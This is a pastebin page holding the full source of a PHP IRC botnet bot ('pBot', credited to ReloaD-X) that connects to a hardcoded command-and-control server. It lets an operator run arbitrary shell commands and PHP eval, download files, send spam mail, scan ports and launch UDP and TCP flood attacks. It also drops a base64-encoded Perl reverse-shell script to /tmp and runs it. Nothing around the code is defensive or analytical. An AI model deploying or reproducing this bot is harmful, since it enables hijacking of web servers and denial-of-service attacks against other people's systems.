mey.php

From x, 3 Years ago, written in Plain Text, viewed 1'323 times.
URL http://paste.security-portal.cz/view/318fab3c Embed
Download Paste or View Raw
  1. <?
  2.  
  3. /*
  4. *
  5. * #ReloaD-X@corp. 2010
  6. * REcoding by: bogel
  7. * recky@doctor.com
  8. *
  9. * COMMANDS:
  10. *
  11. * .user <password> //login to the bot
  12. * .logout //logout of the bot
  13. * .die //kill the bot
  14. * .restart //restart the bot
  15. * .mail <to> <from> <subject> <msg> //send an email
  16. * .dns <IP|HOST> //dns lookup
  17. * .download <URL> <filename> //download a file
  18. * .exec <cmd> // uses exec() //execute a command
  19. * .sexec <cmd> // uses shell_exec() //execute a command
  20. * .cmd <cmd> // uses popen() //execute a command
  21. * .php <php code> // uses eval() //execute php code
  22. * .tcpflood <target> <packets> <packetsize> <port> <delay> //tcpflood attack
  23. * .udpflood <target> <packets> <packetsize> <delay> //udpflood attack
  24. * .raw <cmd> //raw IRC command
  25. * .rndnick //change nickname
  26. * .pscan <host> <port> //port scan
  27. * .safe // test safe_mode (dvl)
  28. * .inbox <to> // test inbox (dvl)
  29. * .conback <ip> <port> // conect back (dvl)
  30. * .uname // return shell's uname using a php function (dvl)
  31. *
  32. */
  33.  
  34. set_time_limit(0);
  35. error_reporting(0);
  36. echo "ok!";
  37.  
  38. class pBot
  39. {
  40. var $config = array("server"=>"bot.blackunix.us",
  41. "port"=>"20",
  42. "pass"=>"",
  43. "prefix"=>"crack|",
  44. "maxrand"=>"50",
  45. "chan"=>"#metri",
  46. "chan2"=>"#metri",
  47. "key"=>"none",
  48. "modes"=>"+ps",
  49. "password"=>"crack",
  50. "trigger"=>".",
  51. "hostauth"=>"bogel.us" // * for any hostname (remember: /setvhost pasukan.ddos.reload-x.info)
  52. );
  53. var $users = array();
  54. function start()
  55. {
  56. if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30)))
  57. $this->start();
  58. $ident = $this->config['prefix'];
  59. $alph = range("0","9");
  60. for($i=0;$i<$this->config['maxrand'];$i++)
  61. $ident .= $alph[rand(0,9)];
  62. if(strlen($this->config['pass'])>0)
  63. $this->send("PASS ".$this->config['pass']);
  64. $this->send("USER ".$ident." 127.0.0.1 localhost :".php_uname()."");
  65. $this->set_nick();
  66. $this->main();
  67. }
  68. function main()
  69. {
  70. while(!feof($this->conn))
  71. {
  72. $this->buf = trim(fgets($this->conn,512));
  73. $cmd = explode(" ",$this->buf);
  74. if(substr($this->buf,0,6)=="PING :")
  75. {
  76. $this->send("PONG :".substr($this->buf,6));
  77. }
  78. if(isset($cmd[1]) && $cmd[1] =="001")
  79. {
  80. $this->send("MODE ".$this->nick." ".$this->config['modes']);
  81. $this->join($this->config['chan'],$this->config['key']);
  82. if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
  83. else { $safemode = "off"; }
  84. $uname = php_uname();
  85. $this->privmsg($this->config['chan2'],"[\2uname!\2]: $uname (safe: $safemode)");
  86.  
  87. }
  88. if(isset($cmd[1]) && $cmd[1]=="433")
  89. {
  90. $this->set_nick();
  91. }
  92. if($this->buf != $old_buf)
  93. {
  94. $mcmd = array();
  95. $msg = substr(strstr($this->buf," :"),2);
  96. $msgcmd = explode(" ",$msg);
  97. $nick = explode("!",$cmd[0]);
  98. $vhost = explode("@",$nick[1]);
  99. $vhost = $vhost[1];
  100. $nick = substr($nick[0],1);
  101. $host = $cmd[0];
  102. if($msgcmd[0]==$this->nick)
  103. {
  104. for($i=0;$i<count($msgcmd);$i++)
  105. $mcmd[$i] = $msgcmd[$i+1];
  106. }
  107. else
  108. {
  109. for($i=0;$i<count($msgcmd);$i++)
  110. $mcmd[$i] = $msgcmd[$i];
  111. }
  112. if(count($cmd)>2)
  113. {
  114. switch($cmd[1])
  115. {
  116. case "QUIT":
  117. if($this->is_logged_in($host))
  118. {
  119. $this->log_out($host);
  120. }
  121. break;
  122. case "PART":
  123. if($this->is_logged_in($host))
  124. {
  125. $this->log_out($host);
  126. }
  127. break;
  128. case "PRIVMSG":
  129. if(!$this->is_logged_in($host) && ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*"))
  130. {
  131. if(substr($mcmd[0],0,1)==".")
  132. {
  133. switch(substr($mcmd[0],1))
  134. {
  135. case "user":
  136. if($mcmd[1]==$this->config['password'])
  137. {
  138. $this->privmsg($this->config['chan'],"[\2Auth\2]: OK $nick You Are Ready... My OwnER !!!");
  139. $this->log_in($host);
  140. }
  141. else
  142. {
  143. $this->privmsg($this->config['chan'],"[\2Auth\2]: FUCK YOU..!! $nick !!!!");
  144. }
  145. break;
  146. }
  147. }
  148. }
  149. elseif($this->is_logged_in($host))
  150. {
  151. if(substr($mcmd[0],0,1)==".")
  152. {
  153. switch(substr($mcmd[0],1))
  154. {
  155. case "restart":
  156. $this->send("QUIT :restart commando from $nick");
  157. fclose($this->conn);
  158. $this->start();
  159. break;
  160. case "mail": //mail to from subject message
  161. if(count($mcmd)>4)
  162. {
  163. $header = "From: <".$mcmd[2].">";
  164. if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header))
  165. {
  166. $this->privmsg($this->config['chan'],"[\2mail\2]: Impossivel mandar e-mail.");
  167. }
  168. else
  169. {
  170. $this->privmsg($this->config['chan'],"[\2mail\2]: Mensagem enviada para \2".$mcmd[1]."\2");
  171. }
  172. }
  173. break;
  174. case "safe":
  175. if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
  176. {
  177. $safemode = "on";
  178. }
  179. else {
  180. $safemode = "off";
  181. }
  182. $this->privmsg($this->config['chan'],"[\2safe mode\2]: ".$safemode."");
  183. break;
  184. case "inbox": //teste inbox
  185. if(isset($mcmd[1]))
  186. {
  187. $token = md5(uniqid(rand(), true));
  188. $header = "From: <inbox".$token."@Guardi4n>";
  189. $a = php_uname();
  190. $b = getenv("SERVER_SOFTWARE");
  191. $c = gethostbyname($_SERVER["HTTP_HOST"]);
  192. if(!mail($mcmd[1],"InBox Test","#pepek@yahoo.com. since 2003\n\nip: $c \nsoftware: $b \nsystem: $a \nvuln: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."\n\ngreetz: wicked\nby: dvl <jatim.community@gmail.com>",$header))
  193. {
  194. $this->privmsg($this->config['chan'],"[\2inbox\2]: Unable to send");
  195. }
  196. else
  197. {
  198. $this->privmsg($this->config['chan'],"[\2inbox\2]: Message sent to \2".$mcmd[1]."\2");
  199. }
  200. }
  201. break;
  202. case "conback":
  203. if(count($mcmd)>2)
  204. {
  205. $this->conback($mcmd[1],$mcmd[2]);
  206. }
  207. break;
  208. case "dns":
  209. if(isset($mcmd[1]))
  210. {
  211. $ip = explode(".",$mcmd[1]);
  212. if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3]))
  213. {
  214. $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1]));
  215. }
  216. else
  217. {
  218. $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1]));
  219. }
  220. }
  221. break;
  222. case "info":
  223. case "vunl":
  224. if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
  225. else { $safemode = "off"; }
  226. $uname = php_uname();
  227. $this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
  228. $this->privmsg($this->config['chan'],"[\2vuln\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."");
  229. break;
  230. case "bot":
  231. $this->privmsg($this->config['chan'],"[\2bot\2]: phpbot 2.0 recording by bogel.");
  232. break;
  233. case "uname":
  234. if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
  235. else { $safemode = "off"; }
  236. $uname = php_uname();
  237. $this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
  238. break;
  239. case "rndnick":
  240. $this->set_nick();
  241. break;
  242. case "raw":
  243. $this->send(strstr($msg,$mcmd[1]));
  244. break;
  245. case "eval":
  246. $eval = eval(substr(strstr($msg,$mcmd[1]),strlen($mcmd[1])));
  247. break;
  248. case "sexec":
  249. $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
  250. $exec = shell_exec($command);
  251. $ret = explode("\n",$exec);
  252. for($i=0;$i<count($ret);$i++)
  253. if($ret[$i]!=NULL)
  254. $this->privmsg($this->config['chan']," : ".trim($ret[$i]));
  255. break;
  256.  
  257. case "exec":
  258. $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
  259. $exec = exec($command);
  260. $ret = explode("\n",$exec);
  261. for($i=0;$i<count($ret);$i++)
  262. if($ret[$i]!=NULL)
  263. $this->privmsg($this->config['chan']," : ".trim($ret[$i]));
  264. break;
  265.  
  266. case "passthru":
  267. $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
  268. $exec = passthru($command);
  269. $ret = explode("\n",$exec);
  270. for($i=0;$i<count($ret);$i++)
  271. if($ret[$i]!=NULL)
  272. $this->privmsg($this->config['chan']," : ".trim($ret[$i]));
  273. break;
  274.  
  275. case "popen":
  276. if(isset($mcmd[1]))
  277. {
  278. $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
  279. $this->privmsg($this->config['chan'],"[\2popen\2]: $command");
  280. $pipe = popen($command,"r");
  281. while(!feof($pipe))
  282. {
  283. $pbuf = trim(fgets($pipe,512));
  284. if($pbuf != NULL)
  285. $this->privmsg($this->config['chan']," : $pbuf");
  286. }
  287. pclose($pipe);
  288. }
  289.  
  290. case "system":
  291. $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
  292. $exec = system($command);
  293. $ret = explode("\n",$exec);
  294. for($i=0;$i<count($ret);$i++)
  295. if($ret[$i]!=NULL)
  296. $this->privmsg($this->config['chan']," : ".trim($ret[$i]));
  297. break;
  298.  
  299.  
  300. case "pscan": // .pscan 127.0.0.1 6667
  301. if(count($mcmd) > 2)
  302. {
  303. if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15))
  304. $this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2open\2");
  305. else
  306. $this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2closed\2");
  307. }
  308. break;
  309.  
  310.  
  311. case "download":
  312. if(count($mcmd) > 2)
  313. {
  314. if(!$fp = fopen($mcmd[2],"w"))
  315. {
  316. $this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download. Permissao negada.");
  317. }
  318. else
  319. {
  320. if(!$get = file($mcmd[1]))
  321. {
  322. $this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download de \2".$mcmd[1]."\2");
  323. }
  324. else
  325. {
  326. for($i=0;$i<=count($get);$i++)
  327. {
  328. fwrite($fp,$get[$i]);
  329. }
  330. $this->privmsg($this->config['chan'],"[\2download\2]: Arquivo \2".$mcmd[1]."\2 baixado para \2".$mcmd[2]."\2");
  331. }
  332. fclose($fp);
  333. }
  334. }
  335. else { $this->privmsg($this->config['chan'],"[\2download\2]: use .download http://your.host/file /tmp/file"); }
  336. break;
  337. case "die":
  338. $this->send("QUIT : $nick Pasukan-ddos-ReloaD-X");
  339. fclose($this->conn);
  340. exit;
  341. case "logout":
  342. $this->log_out($host);
  343. $this->privmsg($this->config['chan'],"[\2auth\2]: $nick LoL !!");
  344. break;
  345. case "udpflood":
  346. if(count($mcmd)>3)
  347. {
  348. $this->udpflood($mcmd[1],$mcmd[2],$mcmd[3]);
  349. }
  350. break;
  351. case "tcpflood":
  352. if(count($mcmd)>5)
  353. {
  354. $this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]);
  355. }
  356. break;
  357. }
  358. }
  359. }
  360. break;
  361. }
  362. }
  363. }
  364. $old_buf = $this->buf;
  365. }
  366. $this->start();
  367. }
  368. function send($msg)
  369. {
  370. fwrite($this->conn,"$msg\r\n");
  371.  
  372. }
  373. function join($chan,$key=NULL)
  374. {
  375. $this->send("JOIN $chan $key");
  376. }
  377. function privmsg($to,$msg)
  378. {
  379. $this->send("PRIVMSG $to :$msg");
  380. }
  381. function notice($to,$msg)
  382. {
  383. $this->send("NOTICE $to :$msg");
  384. }
  385. function is_logged_in($host)
  386. {
  387. if(isset($this->users[$host]))
  388. return 1;
  389. else
  390. return 0;
  391. }
  392. function log_in($host)
  393. {
  394. $this->users[$host] = true;
  395. }
  396. function log_out($host)
  397. {
  398. unset($this->users[$host]);
  399. }
  400. function set_nick()
  401. {
  402. if(isset($_SERVER['SERVER_SOFTWARE']))
  403. {
  404. if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"apache"))
  405. $this->nick = "[BOT]";
  406. elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"iis"))
  407. $this->nick = "[BOT]";
  408. elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"xitami"))
  409. $this->nick = "[BOT]";
  410. else
  411. $this->nick = "[BOT]";
  412. }
  413. else
  414. {
  415. $this->nick = "[BOT]";
  416. }
  417. $this->nick .= $this->config['prefix'];
  418. for($i=0;$i<$this->config['maxrand'];$i++)
  419. $this->nick .= mt_rand(0,9);
  420. $this->send("NICK ".$this->nick);
  421. }
  422. function udpflood($host,$packetsize,$time) {
  423. $this->privmsg($this->config['chan'],"[\2UdpFlood Started!\2]");
  424. $packet = "";
  425. for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); }
  426. $timei = time();
  427. $i = 0;
  428. while(time()-$timei < $time) {
  429. $fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5);
  430. fwrite($fp,$packet);
  431. fclose($fp);
  432. $i++;
  433. }
  434. $env = $i * $packetsize;
  435. $env = $env / 1048576;
  436. $vel = $env / $time;
  437. $vel = round($vel);
  438. $env = round($env);
  439. $this->privmsg($this->config['chan'],"[\2UdpFlood Finished!\2]: $env MB enviados / Media: $vel MB/s ");
  440. }
  441. function tcpflood($host,$packets,$packetsize,$port,$delay)
  442. {
  443. $this->privmsg($this->config['chan'],"[\2TcpFlood Started!\2]");
  444. $packet = "";
  445. for($i=0;$i<$packetsize;$i++)
  446. $packet .= chr(mt_rand(1,256));
  447. for($i=0;$i<$packets;$i++)
  448. {
  449. if(!$fp=fsockopen("tcp://".$host,$port,$e,$s,5))
  450. {
  451. $this->privmsg($this->config['chan'],"[\2TcpFlood\2]: Error: <$e>");
  452. return 0;
  453. }
  454. else
  455. {
  456. fwrite($fp,$packet);
  457. fclose($fp);
  458. }
  459. sleep($delay);
  460. }
  461. $this->privmsg($this->config['chan'],"[\2TcpFlood Finished!\2]: Config - $packets pacotes para $host:$port.");
  462. }
  463. function conback($ip,$port)
  464. {
  465. $this->privmsg($this->config['chan'],"[\2conback\2]: tentando conectando a $ip:$port");
  466. $dc_source = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KcHJpbnQgIkRhdGEgQ2hhMHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQppZiAoISRBUkdWWzBdKSB7DQogIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQogIGV4aXQoMSk7DQp9DQpwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iOw0KJGhvc3QgPSAkQVJHVlswXTsNCiRwb3J0ID0gODA7DQppZiAoJEFSR1ZbMV0pIHsNCiAgJHBvcnQgPSAkQVJHVlsxXTsNCn0NCnByaW50ICJbKl0gQ29ubmVjdGluZy4uLlxuIjsNCiRwcm90byA9IGdldHByb3RvYnluYW1lKCd0Y3AnKSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0Kc29ja2V0KFNFUlZFUiwgUEZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsNCm15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KaWYgKCFjb25uZWN0KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogIGRpZSgiVW5hYmxlIHRvIENvbm5lY3RcbiIpOw0KfQ0KcHJpbnQgIlsqXSBTcGF3bmluZyBTaGVsbFxuIjsNCmlmICghZm9yayggKSkgew0KICBvcGVuKFNURElOLCI+JlNFUlZFUiIpOw0KICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgb3BlbihTVERFUlIsIj4mU0VSVkVSIik7DQogIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow0KICBleGl0KDApOw0KfQ0KcHJpbnQgIlsqXSBEYXRhY2hlZFxuXG4iOw==";
  467. if (is_writable("/tmp"))
  468. {
  469. if (file_exists("/tmp/dc.pl")) { unlink("/tmp/dc.pl"); }
  470. $fp=fopen("/tmp/dc.pl","w");
  471. fwrite($fp,base64_decode($dc_source));
  472. passthru("perl /tmp/dc.pl $ip $port &");
  473. unlink("/tmp/dc.pl");
  474. }
  475. else
  476. {
  477. if (is_writable("/var/tmp"))
  478. {
  479. if (file_exists("/var/tmp/dc.pl")) { unlink("/var/tmp/dc.pl"); }
  480. $fp=fopen("/var/tmp/dc.pl","w");
  481. fwrite($fp,base64_decode($dc_source));
  482. passthru("perl /var/tmp/dc.pl $ip $port &");
  483. unlink("/var/tmp/dc.pl");
  484. }
  485. if (is_writable("."))
  486. {
  487. if (file_exists("dc.pl")) { unlink("dc.pl"); }
  488. $fp=fopen("dc.pl","w");
  489. fwrite($fp,base64_decode($dc_source));
  490. passthru("perl dc.pl $ip $port &");
  491. unlink("dc.pl");
  492. }
  493. }
  494. }
  495. }
  496.  
  497. $bot = new pBot;
  498. $bot->start();
  499.  
  500. ?>
  501.  

Reply to "mey.php"

Here you can reply to the paste above